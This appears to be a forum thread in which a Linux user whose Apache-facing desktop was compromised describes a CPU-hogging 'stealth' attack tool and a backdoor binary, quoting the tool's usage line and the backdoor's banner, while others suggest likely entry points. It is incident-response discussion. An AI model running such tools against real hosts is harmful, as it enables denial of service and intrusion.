Background: I run a Linux desktop, but it's also facing the net (port 8080) as a webserver. (For services, it's providing ssh, http, samba, amphetadesk, and webmin. I'm NAT'ed, though, so only port 8080 is actually facing the public.)
All of a sudden I couldn't get anywhere online, so I started investigating. While looking at network stats, I happened to notice one of my CPUs was spiked at full usage.
top revealed a process known as "stealth" -- owned by user apache -- at 100% CPU usage.
Anyone know what this is? Or where it came from? Unless they were really good (somehow breaching the router, getting into the LAN, and attacking me from there), the only port anyone could see was 8080, running Apache, so, assuming this was some exploit, that's how they got in.
I'm going to poke through the logs to see if I can find anything. But has anyone seen this before that can offer some help?
Okay, my apologies for the barrage of posts. I was sort of freaking out. As it's a desktop box, I have the luxury of just being able to pull it off the network and take my time. (I'm now on a laptop.)
What I'm really interested in now is how they got in. I'd have expected it to be over ssh or something, but they really shouldn't have been able to. (Unless first getting into something else on the LAN here.)
That "stealth" program is clearly no good:
# ./stealth -h
This tool is extremely dangerous. Use at your own risk!
Usage: st-kill <host> <port>
There's also a binary called sendmail, and the bin/bsh that they were running. "Reading" the binary of bin/bsh shows the string "You Have B4CKD0r3d this B0x....", along with references to things like memcpy, stdout, wapipid, strcopy, libc.so.6. (And tons of gibberish, since I'm looking at a binary file in vi.) Do you think (I can't find any information) that this is what was listening on port 80 / 8080 / 443? (I'd opened a telnet session to 80, but no matter what I typed, it didn't do anything.)
Can anyone offer me help in tracking exactly how they got in?
Kiddin, good work though. Next time you want to check out strings in a binary file there is the "strings" command (may or may not be installed) that can be easier than just looking though it with an editor.
Typically if you see a box with a lot of junk in /tmp and not-so-carefully hidden processes, you can be almost sure its a vulnerability in a php or cgi script somewhere.
This is May 4, 2011 and I have the same problem. I found your thread today with the same process running owning nearly 100% CPU. The only difference is that the owner of that process is guest instead of apache. I have Fedora 14, and all packages are up-to-date.